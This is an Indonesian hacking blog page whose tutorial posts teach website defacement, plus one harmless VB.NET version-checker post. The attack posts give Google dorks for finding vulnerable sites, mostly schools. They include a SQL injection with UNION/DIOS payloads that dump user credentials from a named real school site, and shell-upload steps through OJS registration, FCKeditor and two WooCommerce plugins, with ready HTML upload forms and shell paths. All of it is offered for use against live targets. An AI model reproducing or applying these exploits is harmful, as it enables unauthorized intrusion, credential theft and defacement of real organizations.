RasyidMF: Tutorial

Latest Updates

Showing posts with label Tutorial. Show all posts
Showing posts with label Tutorial. Show all posts

Cara deface Sql injection CMS Formulasi Versi RasyidMF

05:45:00

Cara deface CMS Formulasi Versi RasyidMF
Ok guys :), welcome back to my blog again :v . btw hari ini gw mau ngasih tutorial buat kalean, tutorial hack website sih :/ . tpi gk apalah :) buat belajar belajar kan :"v
Ok langsung sadja ;)

Tools yang di butuhkan :
1. Mozzila (Versi 47.0.1) *Yang baru gk bisa instal Hackbar
2. Advance Hackbar (Klik disini)
3. Koneksi
4. Dork (contoh : inurl:/kelas-siswa.html, Yg lain di kembangkan)
Ok setelah semua udah siap lu install/pasang :) , langsung aj ke tutorialnya ;)

Btw sebelum itu, Letak vuln nya ;) gw kasih tau dulu yak :"v
Vuln : /kelas-siswa.html
Exploit : [POSTDATA]kelas=[sql]

Tutorial :

1.kita buka web http://smkn1-kedawung.sch.id/smea/kelas-siswa.html kemudian pada form kelas kita pilih salah satu jenis kelas. perhatikan gambar di bawah
2.kemudian kita aktifkan hackbar yang udah kita pasang tadi dengan menekan tombol f9. kemudian load url dan post data kita centang.*Biasanya udah muncul sendiri pas diinstal
3.terlihat parameter kelas=10 pada post data. kita cek dengan menambahkan tanda kutip (') .. yups.. terjadi error. berarti injeksi dapat kita lanjutkan >> Gk semua website muncul error gitu, meskipun gk muncul, tetep aj lanjutin tutorialny ;), seperti dibawah ini
*Gk muncul error bukan berarti gk vuln :)
4.Kemudian masukan exploit ini [SQL]' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27# dan setelah itu klik execute hasil nya akan seperti ini (2018)
Dan muncul angka ajaibny 1,4,6,25 :)
*Ingat, gk semua coloum angka (27), bisa aja yang lain
5.Kemudian, kita block angka 6 yang ada di hackbar, kemudian di Advance Hackbarnya pilih UNION BASED > Dios MYSQL > Dios Madblood dan hasilnya akan seperti ini
>> Setelah execute
*Noh dapat db nya :D, sama coloum rd3grz_users :namausers dan rd3grz_users :sandiusers
6.Yak kita udah dapat Nama DB + Coloumnya, sekarang tinggal kita ganti information_schema.columns,table_name,coloum_name di Post data Hackbar menjadi (contoh : UNION SELECT 1,2,3,4,5,(Select+export_set(5,@:=0,(select+count(*)from(rd3grz_users)where@:=export_set(5,export_set(5,@,namausers,0x3c6c693e,2),sandiusers,0xa3a,2)),@,2)),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#)
7.Jika sudah di ganti, sekarang tinggal di execute dan hasilnya akan seperti ini
8.Enjoy :) , tinggal crack aj tuh pw ny ;)

Etssss... sebelum, itu hash password lu gk bakal bisa bisa lu crack yaaak ;) , hanya bisa di generator sih :/ , dan jga gw dapat source code CMS Formulasi kalo passwordnya itu seperti ini

Itu sadja sih dari tutorial gw ;) 




Cara Membuat Checking Version/Mengecheck Versi Dengan WebClient - VB.NET

01:11:00
Hasil gambar untuk version
Cara Membuat Checking Version/Mengecheck Versi Dengan WebClient - VB.NET
Pasti kalian penasaran kan :V ? dulu mimin juga ini sekarang udeh bisa :D
Mimin kali ini mau share Cara Membuat Checking Version/Mengecheck Versi Dengan WebClient - VB.NET 

Ok Langsung Saja

Alat Yang Dibutuhkan :
  • Microsoft Visual Basic 2010
  • Hosting / Free Hosting
Kalian Buat FreeHosting Terlebih dahulu . Kemudian Buat File di Web tersebut . kasih nama version.txt atau terserah lah. kemudian tulis Versi Aplikasi Kalian di (Contoh : 1.0.0) Version.txt. kemudian save

Tutorial :

1.Buat Project Baru , Baru Isi Namanya "Check Version Application"
2.Klik OK . Baru Buat 1 Button Dan 2 Label
3.Kemudian , Klik 2 Kali Di Buttonnya . Dan Isi Code Ini


Try
Dim client As WebClient = New WebClient
                Dim reader As StreamReader = New StreamReader(client.OpenRead("http://www.namawebhostingkalian.pe.hu/namatxt.txt"))
Label2.Text = reader.ReadToEnd
If Label2.Text = "1.0.0" Then 'Nama Versi Kalian ! Contoh 1.0.0
MsgBox("Aplikasi Ini Adalah Versi Yang Terbaru")
Else
MsgBox("Aplikasi Ini Adalah Versi Yang Lama")
End If
Catch Ex As Exception
MsgBox(Ex.ToString)
End Try



4.Kemudian , Diatas Public Class Form1 Isi Code Ini
Imports System.Net

5.Debug / F5
6.Klik Di Buttonnya
7.Done :D

Ada Masalah ? Contact Mimin Aja www.facebook.com/RasyidMaulan

Cara Deface OJS (Open Journal System)

01:00:00
Hasil gambar untuk OJS
Cara Deface OJS (Open Journal System)
Kali ini mimin akan share Cara Deface OJS (Open Journal System) . bisa di bilang teknik ini ribet :V . karena harus mengregistrasi dulu :3

Dork : intext:Journal "new submission"
inurl:/index.php/index/user/register
intext:about submission "Journal"
inurl:/index.php/ojs

*Yang laen use your brain :D

Fotonya Copas aja ya :D

Tutorial :

1.Kamu harus mendaftar dulu disini > site,com/index.php/index/user/register
-Jangan Lupa untuk mencentang Registrasi sebabagi Author / penulis & Jangan ceklis Email konfimasi
2. Setelah Registasi Klik "New Submission"
3. Selesaikan Step 1
4. Di Step 2, kamu dapat upload shell (contoh format shell : a.phtml)
5.Jika Sukses ! maka akan muncul seperti ini
6.Cari akses shell nya

Penjelasan : 
Filename : 4-4-1-SM.phtml
4 = id user kamu

Shell Path : 
http://www.contoh.com/files/journals/1/articles/[iduser]/submission/original/[nama file].phtml

Contoh : files/journals/1/articles/4/submission/original/4-4-1-SM.phtml

Cara Deface Dengan FCKeditor

22:22:00
Hasil gambar untuk fckeditor
Cara Deface Dengan FCKeditor - 
Yak kali ini mimin akan share tutorial Deface Dengan Cara Deface Dengan FCKeditor. Dengan menggunakan FCKeditor, kita bisa mengupload sebuah file ke web tersebut seperti halnya mengupload file deface, namun berformat txt. Ok, berikut caranya.
Buatlah sebuah file berformat txt dengan notepad, isi dengan kata - kata yang ingin diucapkan layaknya file deface, jangan lupa di save dan beri nama

Dork :
inurl:/html/siswa.php? site:sch.id
inurl:/html/alumni.php? site:sch.id
inurl:/html/guru.php? site:sch.id
inurl:/editor/filemanager/connectors/test.html
*Cari sendiri yang perawan :3

Biasanya di web Sekolah !

Exploit : /editor/filemanager/connectors/test.html

Tutorial :

1.Cari Web nya make Dork Yang Diatas. Jika sudah dapat , Masukan Exploitnya
/editor/filemanager/connectors/test.html
Contoh : www.site.com/editor/filemanager/connectors/test.html

2.Jika Vuln , maka akan muncul seperti ini
Cara Deface Web Sch.id Dengan FCKeditor
Sesuai gambar, di kolom connector silahkan anda ganti dengan PHP. Resource type file

6. Klik "pilih file" dan pilih file txt yang sudah dibuat tadi

7. Klik "upload"

8. Jika berhasil akan muncul tulisan kira - kira seperti ini 'file uploaded with no error'

9. Untuk melihat file uploadnya, anda buka webnya dengan www.site.com/userfiles/file/namafilemu.txt

10. Jika berhasil maka nanti akan muncul text yang tadi anda buat di notepad.

Gitu saja Tutorial dari Newbie :V
Kalo masih gk ngerti ! Koment aja di bawah :V

Cara Deface WP Plugins WooCommerce Products Customizer Fileupload

23:21:00
Hasil gambar untuk WP Plugins WooCommerce Products Customizer Fileupload
Cara Deface WP Plugins WooCommerce Products Customizer Fileupload
Yak kali ini ane akan mengshare Tutorial "Cara Deface WP Plugins WooCommerce Products Customizer Fileupload"
sebenarnya nih bukan deface ! atau cuman bisa upload gambar ! tpi gk thu juga kan , cobain aja pas bisa upload shell
Tadi ane barusan aja muter muter di web orang , nah pas ane bukan foldernya woocommerce-products-customizer . tiba tiba blank ane coba coba mau :D
Tpi pas itu ane coba upload shell gk mau , mungkin di web lain bisa :D. Bisa bisa neh Trik baru :D 

HTML Vroh : <form method="POST" action="http://test.jacketman.net/wp-content/plugins/woocommerce-products-customizer/jquery_calls.php"
enctype="multipart/form-data">
<input type="file" name="userfile"/><button>Croot Punyamu</button>
</form>

Yang warna biru ganti webnya :D

Dorknya Guyss : 
inurl:/wp-content/plugins/woocommerce-products-customizer/

Exploit nya guys : /wp-content/plugins/woocommerce-products-customizer/jquery_calls.php

Tutorial :

1.Cari web dari dork yang udeh mimin siapkan , buka web tersebut . masukan exploit , jika Gambarnya Blank berarti Vuln :D
2.Kemudian buka HTML Exploit nya tadi , kemudian cari file .jpg atau terserah lah
3.Jika berhasil maka akan muncul seperti dibawah ini
4.Filenya akan berada di http://test.jacketman.net//wp-content//uploads//57f9e15a25804.jpg
5.Jika gk berhasil , mungkin muncul nya cuman tulisan :D
6.Enjoy


Trik Dari Mastah Ane : Mr.D3c0d3r #98 + 5uSu S4p1

-=- THANKS FOR READING :D -=-

Deface Wp-Woocommerce Custom Tshirt Shell Upload Vulnerability

22:37:00
Hasil gambar untuk woocommerce
Deface Wp-Woocommerce Custom Tshirt Shell Upload Vulnerability
Langsung saja ke tutorial !

Dork : inurl:/wp-content/plugins/woocommerce-custom-t-shirt-
*Yang laen use your brain atau Contact mimin aj :D . biasanya dia bisa buat dork sendiri

HTML Exploit :
<form enctype="multipart/form-data"
    action="http://www.targetkalian.com/wp-content/plugins/woocommerce-custom-t-shirt-designer/includes/templates/template-black/designit/cs/upload.php" method="post">
    <input type="jpg" name="url" value="./" /><br />
    Please choose a file: <input name="uploadfile" type="file" /><br />
    <input type="submit" value="upload" />
    </form>

Exploit : /wp-content/plugins/woocommerce-custom-t-shirt-designer/includes/templates/template-black/designit/cs/upload.php

Lokasi Shell : /wp-content/plugins/woocommerce-custom-t-shirt-designer/includes/templates/template-black/designit/cs/uploadImage/(Nomor random).php

Tutorial :


1.Jika ada tulisan "error" di web tersebut , berarti Vuln 


2.Copy Link yang Vuln , kemudian paste di HTML Exploit Yang Bertanda Warna Merah Diatas

3.Pilih Shell kalian , kemudian klik Upload
4.Maka akan muncul angka acak Contoh : "1285798710.php"
5.Akses Shellnya :  /wp-content/plugins/woocommerce-custom-t-shirt-designer/includes/templates/template-black/designit/cs/uploadImage/(Nomor acak yang tadi).php

6.Enjoy ! Terserah dah mau di apain tuh web

-=-THANKS FOR READING :D-=-

 
Copyright © RasyidMF. Designed by OddThemes & Best Wordpress Themes 2018